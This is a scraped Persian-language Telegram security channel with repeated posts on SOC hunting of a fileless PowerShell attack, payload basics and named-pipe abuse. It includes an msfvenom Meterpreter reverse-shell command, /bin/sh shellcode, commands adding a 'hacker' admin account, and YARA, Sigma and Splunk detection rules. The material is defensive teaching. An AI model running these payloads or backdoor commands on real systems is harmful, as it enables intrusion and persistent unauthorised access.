✔️ استخراج و تحلیل payload از حافظه با Volatility برای بررسی روشهای مهاجم.
✔️ ایجاد قوانین YARA و Sigma برای تشخیص اجرای کدهای مخرب.
✔️ استفاده از Sysmon برای نظارت بر اجرای فرآیندهای PowerShell
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
به همراه اقدامات برای هانت
🟣بررسی یک حمله دم دستی
امروز میخوام بجای یک ایده جدید ، یه حمله تیپیکال که در SOC میبینید رو با هم مرور کنیم.
📌 سناریو:
یک مهاجم از طریق PowerShell اقدام به اجرای یک fileless attack در شبکه سازمان کرده است. SOC یک هشدار دریافت کرده که نشان میدهد یک فرآیند مشکوک PowerShell با پارامترهای مبهمسازیشده (obfuscated) اجرا شده است.
🔆هدف ما:
شناسایی حمله با بررسی لاگهای PowerShell.
بررسی ارتباطات شبکهای مخرب.
استخراج payload مخرب از حافظه.
تحلیل بدافزار و روشهای آن.
ارائه راهکارهای مقابله و همچنین شکار تهدید برای جلوگیری از حملات مشابه در آینده و کشف های جدید
🔍 ۱. بررسی اولیه هشدار و کشف فرآیند مشکوک
فرآیند powershell.exe با پارامترهای زیر اجرا شده است:
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgA
این مقدار Base64 encoded است. برای رمزگشایی، در PowerShell دستور زیر را اجرا میکنیم:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SQBFAFgA"))
📌 نتیجه: این مقدار به دستور Invoke-Expression (IEX) تبدیل میشود، که نشانهای از اجرای یک کد از راه دور است.
🔍 ۲. جستجوی فرآیندهای مشکوک در اسپلانک
index=windows EventCode=4104 | search "IEX(" OR "DownloadString(" OR "Convert.FromBase64String("
📌 نتیجه: مشاهده چندین اجرای مشکوک از PowerShell همراه با DownloadString که نشاندهنده دانلود payload از اینترنت است.
🔍 ۳. بررسی ارتباطات شبکهای مشکوک
برای بررسی اینکه PowerShell به چه دامنههایی متصل شده، از netstat استفاده میکنیم:
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -like "*.*.*.*" }
📌 نتیجه: مشاهده یک ارتباط به http://malicious[.]domain/payload.ps1
✅ گام بعدی: استفاده از Wireshark برای مشاهده ترافیک HTTP و استخراج دادهها:
http.request.full_uri contains "malicious[.]domain"
📌 نتیجه: مهاجم در حال دانلود یک payload مخرب است.
🔍 ۴. استخراج کد مخرب از حافظه برای تحلیل بیشتر
از ابزار Volatility برای بررسی فرآیند powershell.exe و استخراج کد استفاده میکنیم:
volatility -f memory.dmp --profile=Win10x64 procdump -p 1234 -D output/
📌 نتیجه: مشاهده کدی که در حافظه لود شده است. این کد شامل یک Reflective DLL Injection میباشد.
🔹 آنالیز بیشتر با YARA برای بررسی رفتار کد استخراجشده:
rule Suspicious_PowerShell {
meta:
denoscription = "Detects obfuscated PowerShell payloads"
strings:
$a = "IEX("
$b = "DownloadString"
$c = "System.Reflection.Assembly::Load"
condition:
any of ($a,$b,$c)
}
📌 نتیجه: این کد دارای قابلیت اجرای Reflective DLL Injection است، که در حملات APT بهکار میرود.
🔍 ۵. تحلیل پیشرفتهتر با Sysmon برای شناسایی رفتار مهاجم
ابزار Sysmon یکی از بهترین ابزارها برای شکار رفتارهای مخرب PowerShell است. برای بررسی، از sysmon -c خروجی میگیریم:
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Select-String "powershell.exe"
📌 نتیجه: مشاهده Event ID 1 (Process Creation) که نشان میدهد PowerShell با پارامترهای مشکوک اجرا شده است.
✅ گام بعدی:
ساخت یک قانون Sigma برای شناسایی اجرای مشابه در آینده:
noscript: Suspicious PowerShell Execution
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- "NoP -NonI -ExecutionPolicy Bypass"
- "IEX("
- "DownloadString("
condition: selection
📌 مزیت:
🚨 هر زمان که دستورات مشابه اجرا شود، یک هشدار در SIEM ایجاد خواهد شد.
🎯 نتیجهگیری و اقدامات برای جلوگیری از حملات مشابه
✅ اقدامات شکار تهدید (Threat Hunting Actions)
✔️ مانیتورینگ Event ID 4104 در SIEM برای شناسایی اجرای اسکریپتهای مشکوک.
✔️ تحلیل ارتباطات شبکهای با Wireshark برای تشخیص دامنههای مخرب.
✔️ استخراج و تحلیل payload از حافظه با Volatility برای بررسی روشهای مهاجم.
✔️ ایجاد قوانین YARA و Sigma برای تشخیص اجرای کدهای مخرب.
✔️ استفاده از Sysmon برای نظارت بر اجرای فرآیندهای PowerShell
Please open Telegram to view this post
VIEW IN TELEGRAM
#امنیت_به_زبان_ساده
⏮️پیلود (Payload) چیست؟
در زمینهی امنیت سایبری و اکسپلویتها، پیلود (Payload) به بخشی از یک کد مخرب گفته میشود که پس از بهرهبرداری (Exploit) از یک آسیبپذیری ؛ اجرا میشود.
به عبارت دیگر، پیلود همان محتوای اصلی حمله است که هدفش انجام یک عملیات خاص روی سیستم قربانی است، مانند اجرای یک Shellcode، دانلود بدافزار، ایجاد درب پشتی (Backdoor) یا سرقت دادهها.
🟪مثالهای پیلود
☑️اجرای یک معکوس شل (Reverse Shell)
در این روش، مهاجم پس از نفوذ به سیستم، پیلودی را اجرا میکند که یک ارتباط معکوس به سمت مهاجم باز کند. مثلاً در Metasploit، میتوان از این پیلود استفاده کرد:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
یعنی پس از نفوذ اولیه ؛ این پیلود یک Meterpreter Reverse Shell ایجاد میکند که پس از اجرا روی سیستم قربانی، به آدرس IP مهاجم متصل شده و دستورات را از راه دور اجرا میکند. ( تمرینی در درس سنز ۵۰۴)
☑️استفاده از Shellcode برای اجرای یک دستور ساده
اگر بخواهیم پیلودی که فقط یک دستور ساده روی سیستم اجرا کند، مثال زیر را در Assembly x86 داریم:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push eax
mov edx, eax
mov ecx, eax
mov al, 0xb ; syscall execve
int 0x80
این کد یک Shellcode ساده است که /bin/sh را اجرا میکند.
☑️درج یک دربپشتی در سیستم قربانی
اگر مهاجم بخواهد پس از نفوذ به سیستم، یک دربپشتی دائمی ایجاد کند، ممکن است پیلودی بسازد که یک کاربر جدید اضافه کند:
net user hacker Pass123 /add
net localgroup administrators hacker /add
این دستورات، یک کاربر جدید به نام "hacker" را ایجاد کرده و آن را به گروه مدیران اضافه میکنند.
✳️نتیجهگیری
پیلود بخش اصلی یک حملهی سایبری است و میتواند کارهای مختلفی انجام دهد، از اجرای یک شل ساده گرفته تا دانلود و اجرای بدافزارهای پیچیده. در تست نفوذ و امنیت سایبری، شبیهسازی پیلودها برای ارزیابی امنیت سیستمها امری رایج است.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
⏮️پیلود (Payload) چیست؟
در زمینهی امنیت سایبری و اکسپلویتها، پیلود (Payload) به بخشی از یک کد مخرب گفته میشود که پس از بهرهبرداری (Exploit) از یک آسیبپذیری ؛ اجرا میشود.
به عبارت دیگر، پیلود همان محتوای اصلی حمله است که هدفش انجام یک عملیات خاص روی سیستم قربانی است، مانند اجرای یک Shellcode، دانلود بدافزار، ایجاد درب پشتی (Backdoor) یا سرقت دادهها.
🟪مثالهای پیلود
☑️اجرای یک معکوس شل (Reverse Shell)
در این روش، مهاجم پس از نفوذ به سیستم، پیلودی را اجرا میکند که یک ارتباط معکوس به سمت مهاجم باز کند. مثلاً در Metasploit، میتوان از این پیلود استفاده کرد:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
یعنی پس از نفوذ اولیه ؛ این پیلود یک Meterpreter Reverse Shell ایجاد میکند که پس از اجرا روی سیستم قربانی، به آدرس IP مهاجم متصل شده و دستورات را از راه دور اجرا میکند. ( تمرینی در درس سنز ۵۰۴)
☑️استفاده از Shellcode برای اجرای یک دستور ساده
اگر بخواهیم پیلودی که فقط یک دستور ساده روی سیستم اجرا کند، مثال زیر را در Assembly x86 داریم:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push eax
mov edx, eax
mov ecx, eax
mov al, 0xb ; syscall execve
int 0x80
این کد یک Shellcode ساده است که /bin/sh را اجرا میکند.
☑️درج یک دربپشتی در سیستم قربانی
اگر مهاجم بخواهد پس از نفوذ به سیستم، یک دربپشتی دائمی ایجاد کند، ممکن است پیلودی بسازد که یک کاربر جدید اضافه کند:
net user hacker Pass123 /add
net localgroup administrators hacker /add
این دستورات، یک کاربر جدید به نام "hacker" را ایجاد کرده و آن را به گروه مدیران اضافه میکنند.
✳️نتیجهگیری
پیلود بخش اصلی یک حملهی سایبری است و میتواند کارهای مختلفی انجام دهد، از اجرای یک شل ساده گرفته تا دانلود و اجرای بدافزارهای پیچیده. در تست نفوذ و امنیت سایبری، شبیهسازی پیلودها برای ارزیابی امنیت سیستمها امری رایج است.
Please open Telegram to view this post
VIEW IN TELEGRAM
پیادهسازی تست برای آزمایش رولهای کشفی
This solution will allow you to easily deploy an entire lab to create/test your detection rules, simulate logs, play tests, download and run malware and mitre attack techniques, restore the sandbox and many other features.
https://github.com/Krook9d/PurpleLab
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
This solution will allow you to easily deploy an entire lab to create/test your detection rules, simulate logs, play tests, download and run malware and mitre attack techniques, restore the sandbox and many other features.
https://github.com/Krook9d/PurpleLab
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Krook9d/PurpleLab: PurpleLab is an efficient and readily deployable lab solution, providing a swift setup for cybersecurity…
PurpleLab is an efficient and readily deployable lab solution, providing a swift setup for cybersecurity professionals to test detection rules and undertake various security tasks, all accessible ...
به زبان ساده Named Pipeچیست؟
یک Named Pipe یک روش برای ارتباط بین دو برنامه یا پردازش در ویندوز است، مثل یک کانال مخفی بین دو نفر که فقط خودشان میدانند از آن استفاده کنند.
مثال:
فرض کن یک برنامهی چت داری که دو نفر از طریق آن پیام رد و بدل میکنند. اگر به جای استفاده از اینترنت، این دو نفر در یک اتاق مخفی باشند و فقط از یک لولهی پلاستیکی برای حرف زدن استفاده کنند، این همان Named Pipe است!
هکر چطور از Named Pipe سوءاستفاده میکند؟
هکرها از Named Pipe برای ارتباط مخفیانه بین پردازشهای مخرب خود استفاده میکنند.
چند روش رایج:
✴️اجرای دستورات از راه دور (Lateral Movement)
هکر روی یک کامپیوتر دسترسی گرفته و میخواهد به کامپیوتر دیگر در همان شبکه دستور بفرستد.
از Named Pipe برای ارسال فرامین به یک پروسهی مخرب در کامپیوتر دیگر استفاده میکند.
ابزار Cobalt Strike و Metasploit از این روش زیاد استفاده میکنند.
✴️مخفیکردن ارتباطات بین بدافزارها
بدافزار اصلی، یک Named Pipe ایجاد میکند و یک برنامهی دیگر را مجبور میکند که از طریق این Pipe اطلاعات را منتقل کند.
به این روش، "Command and Control (C2) مخفی" میگویند.
✴️دور زدن فایروال و آنتیویروس
چون Named Pipe در داخل خود سیستمعامل اجرا میشود، خیلی از فایروالها و آنتیویروسها متوجه آن نمیشوند.
مهاجم میتواند بدون ارسال داده به اینترنت، اطلاعات را بین دو پروسه رد و بدل کند.
✴️افزایش سطح دسترسی (Privilege Escalation)
بعضی برنامهها از Named Pipe برای دستورات مدیریتی (Admin) استفاده میکنند.
هکر میتواند یک Pipe جعلی با نام مشابه ایجاد کند و سیستم را فریب دهد تا دستورات حساس را به جای برنامهی اصلی، به هکر ارسال کند.
چگونه میتوان جلوی این سوءاستفاده را گرفت؟
✅ پایش (Monitoring) و ثبت لاگ (Logging) → با Sysmon و Event Tracing for Windows (ETW) فعالیتهای مشکوک Named Pipe را شناسایی کنید.
✅ محدود کردن دسترسیها → فقط برنامههای مشخص بتوانند از Named Pipe استفاده کنند.
✅ بررسی رفتار غیرعادی پردازشها → اگر یک پردازش مشکوک یک Named Pipe ایجاد کرد و از طریق آن کد اجرا شد، احتمال حمله وجود دارد.
🟣نتیجه:
هکر از Named Pipe به عنوان یک تونل مخفی برای ارتباط بین بدافزارها، اجرای دستورات از راه دور و دور زدن آنتیویروس استفاده میکند. اگر در SOC فعالیتهای Named Pipe را بررسی نکنید، ممکن است مهاجم به راحتی در شبکه حرکت کند بدون اینکه شناسایی شود.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک Named Pipe یک روش برای ارتباط بین دو برنامه یا پردازش در ویندوز است، مثل یک کانال مخفی بین دو نفر که فقط خودشان میدانند از آن استفاده کنند.
مثال:
فرض کن یک برنامهی چت داری که دو نفر از طریق آن پیام رد و بدل میکنند. اگر به جای استفاده از اینترنت، این دو نفر در یک اتاق مخفی باشند و فقط از یک لولهی پلاستیکی برای حرف زدن استفاده کنند، این همان Named Pipe است!
هکر چطور از Named Pipe سوءاستفاده میکند؟
هکرها از Named Pipe برای ارتباط مخفیانه بین پردازشهای مخرب خود استفاده میکنند.
چند روش رایج:
✴️اجرای دستورات از راه دور (Lateral Movement)
هکر روی یک کامپیوتر دسترسی گرفته و میخواهد به کامپیوتر دیگر در همان شبکه دستور بفرستد.
از Named Pipe برای ارسال فرامین به یک پروسهی مخرب در کامپیوتر دیگر استفاده میکند.
ابزار Cobalt Strike و Metasploit از این روش زیاد استفاده میکنند.
✴️مخفیکردن ارتباطات بین بدافزارها
بدافزار اصلی، یک Named Pipe ایجاد میکند و یک برنامهی دیگر را مجبور میکند که از طریق این Pipe اطلاعات را منتقل کند.
به این روش، "Command and Control (C2) مخفی" میگویند.
✴️دور زدن فایروال و آنتیویروس
چون Named Pipe در داخل خود سیستمعامل اجرا میشود، خیلی از فایروالها و آنتیویروسها متوجه آن نمیشوند.
مهاجم میتواند بدون ارسال داده به اینترنت، اطلاعات را بین دو پروسه رد و بدل کند.
✴️افزایش سطح دسترسی (Privilege Escalation)
بعضی برنامهها از Named Pipe برای دستورات مدیریتی (Admin) استفاده میکنند.
هکر میتواند یک Pipe جعلی با نام مشابه ایجاد کند و سیستم را فریب دهد تا دستورات حساس را به جای برنامهی اصلی، به هکر ارسال کند.
چگونه میتوان جلوی این سوءاستفاده را گرفت؟
✅ پایش (Monitoring) و ثبت لاگ (Logging) → با Sysmon و Event Tracing for Windows (ETW) فعالیتهای مشکوک Named Pipe را شناسایی کنید.
✅ محدود کردن دسترسیها → فقط برنامههای مشخص بتوانند از Named Pipe استفاده کنند.
✅ بررسی رفتار غیرعادی پردازشها → اگر یک پردازش مشکوک یک Named Pipe ایجاد کرد و از طریق آن کد اجرا شد، احتمال حمله وجود دارد.
🟣نتیجه:
هکر از Named Pipe به عنوان یک تونل مخفی برای ارتباط بین بدافزارها، اجرای دستورات از راه دور و دور زدن آنتیویروس استفاده میکند. اگر در SOC فعالیتهای Named Pipe را بررسی نکنید، ممکن است مهاجم به راحتی در شبکه حرکت کند بدون اینکه شناسایی شود.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Network Security Channel
به زبان ساده Named Pipeچیست؟ یک Named Pipe یک روش برای ارتباط بین دو برنامه یا پردازش در ویندوز است، مثل یک کانال مخفی بین دو نفر که فقط خودشان میدانند از آن استفاده کنند. مثال: فرض کن یک برنامهی چت داری که دو نفر از طریق آن پیام رد و بدل میکنند. اگر…
ادامه از قبلی
چگونه Named Pipe را در SOC پایش کنیم؟
۱. فعال کردن Sysmon برای لاگ کردن Pipeهای مشکوک
Event ID 17: ایجاد Named Pipe
Event ID 18: اتصال به Named Pipe
Event ID 3: فعالیت شبکهای مرتبط با Pipe
✅ مثال از لاگ Sysmon:
Event ID: 17
Pipe Name: \\.\pipe\malicious_pipe
Process: C:\Windows\Temp\malware.exe
۲. بررسی Sessionهای غیرمعمول
اگر یک Pipe خارج از Session 0 اجرا شد، بررسی کنید که چرا!
دستورquser را در PowerShell اجرا کن تا ببینی Pipe در چه Sessionی باز شده است.
۳. مقایسه Pipeهای جدید با لیست Pipeهای مجاز
این Pipeهای سیستمی مجاز را لیست کن و Pipeهای جدید را بررسی کنید
۴. نظارت بر ارتباطات غیرعادی بین پردازشها
مثلا، اگر Explorer.exe به Named Pipe یک پردازش مشکوک متصل شود، باید بررسی شود.
جمعبندی: Named Pipe، یک تونل مخفی برای مهاجمان
✅ مهاجمان از Named Pipe برای اجرای کد از راه دور، مخفی کردن ارتباطات، دور زدن آنتیویروس و افزایش دسترسی استفاده میکنند.
✅ اگر در SOC کار میکنید، باید Named Pipe را لاگ و بررسی کنید، چون یک تکنیک محبوب در بدافزارها و حملات APT است.
کوئری اسپلانک
index=windows EventCode=17 OR EventCode=18
| eval pipe_name=lower(PipeName)
| search NOT pipe_name IN ("\\.\pipe\spoolss", "\\.\pipe\lsass", "\\.\pipe\netlogon")
| table _time, Host, ProcessID, Image, PipeName, EventCode
| sort - _time
🔍 این کوئری چه کار میکند؟
✔️ لاگهای ایجاد یا اتصال Named Pipe را فیلتر میکند.
✔️این Pipeهای سیستمی قانونی را حذف میکند (مثل \spoolss و \lsass).
✔️ نتایج را بهصورت جدول زمانی مرتبشده نمایش میدهد.
شناسایی استفاده مشکوک از Named Pipe در شبکه
اگر مهاجم با PsExec یا Cobalt Strike از Named Pipe استفاده کند، معمولاً Pipeهای ناشناخته و غیرمعمول ایجاد میشوند. با این کوئری میتوانید Pipeهایی که بین دو سیستم به کار رفته را پیدا کنید :
index=windows EventCode=3 (Protocol=NamedPipe)
| stats count by PipeName, SourceHost, DestinationHost
| sort - count
✔️ این کوئری Pipeهایی که بین دو کامپیوتر استفاده شدهاند را نمایش میدهد.
✔️ اگر Pipe ناشناختهای بین دو سیستم مهم بانکی باشد، بررسی دقیق لازم است!
برخی بدافزارهای معروف از نامهای خاصی برای Pipe استفاده میکنند، مثل:
\\.\pipe\mspipe (Cobalt Strike)
\\.\pipe\remcom (PsExec)
\\.\pipe\postex (Meterpreter)
📌 برای پیدا کردن این موارد در Splunk:
index=windows EventCode=17 OR EventCode=18
| search PipeName IN ("\\.\pipe\mspipe", "\\.\pipe\remcom", "\\.\pipe\postex")
| table _time, Host, PipeName, Image
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
چگونه Named Pipe را در SOC پایش کنیم؟
۱. فعال کردن Sysmon برای لاگ کردن Pipeهای مشکوک
Event ID 17: ایجاد Named Pipe
Event ID 18: اتصال به Named Pipe
Event ID 3: فعالیت شبکهای مرتبط با Pipe
✅ مثال از لاگ Sysmon:
Event ID: 17
Pipe Name: \\.\pipe\malicious_pipe
Process: C:\Windows\Temp\malware.exe
۲. بررسی Sessionهای غیرمعمول
اگر یک Pipe خارج از Session 0 اجرا شد، بررسی کنید که چرا!
دستورquser را در PowerShell اجرا کن تا ببینی Pipe در چه Sessionی باز شده است.
۳. مقایسه Pipeهای جدید با لیست Pipeهای مجاز
این Pipeهای سیستمی مجاز را لیست کن و Pipeهای جدید را بررسی کنید
۴. نظارت بر ارتباطات غیرعادی بین پردازشها
مثلا، اگر Explorer.exe به Named Pipe یک پردازش مشکوک متصل شود، باید بررسی شود.
جمعبندی: Named Pipe، یک تونل مخفی برای مهاجمان
✅ مهاجمان از Named Pipe برای اجرای کد از راه دور، مخفی کردن ارتباطات، دور زدن آنتیویروس و افزایش دسترسی استفاده میکنند.
✅ اگر در SOC کار میکنید، باید Named Pipe را لاگ و بررسی کنید، چون یک تکنیک محبوب در بدافزارها و حملات APT است.
کوئری اسپلانک
index=windows EventCode=17 OR EventCode=18
| eval pipe_name=lower(PipeName)
| search NOT pipe_name IN ("\\.\pipe\spoolss", "\\.\pipe\lsass", "\\.\pipe\netlogon")
| table _time, Host, ProcessID, Image, PipeName, EventCode
| sort - _time
🔍 این کوئری چه کار میکند؟
✔️ لاگهای ایجاد یا اتصال Named Pipe را فیلتر میکند.
✔️این Pipeهای سیستمی قانونی را حذف میکند (مثل \spoolss و \lsass).
✔️ نتایج را بهصورت جدول زمانی مرتبشده نمایش میدهد.
شناسایی استفاده مشکوک از Named Pipe در شبکه
اگر مهاجم با PsExec یا Cobalt Strike از Named Pipe استفاده کند، معمولاً Pipeهای ناشناخته و غیرمعمول ایجاد میشوند. با این کوئری میتوانید Pipeهایی که بین دو سیستم به کار رفته را پیدا کنید :
index=windows EventCode=3 (Protocol=NamedPipe)
| stats count by PipeName, SourceHost, DestinationHost
| sort - count
✔️ این کوئری Pipeهایی که بین دو کامپیوتر استفاده شدهاند را نمایش میدهد.
✔️ اگر Pipe ناشناختهای بین دو سیستم مهم بانکی باشد، بررسی دقیق لازم است!
برخی بدافزارهای معروف از نامهای خاصی برای Pipe استفاده میکنند، مثل:
\\.\pipe\mspipe (Cobalt Strike)
\\.\pipe\remcom (PsExec)
\\.\pipe\postex (Meterpreter)
📌 برای پیدا کردن این موارد در Splunk:
index=windows EventCode=17 OR EventCode=18
| search PipeName IN ("\\.\pipe\mspipe", "\\.\pipe\remcom", "\\.\pipe\postex")
| table _time, Host, PipeName, Image
Please open Telegram to view this post
VIEW IN TELEGRAM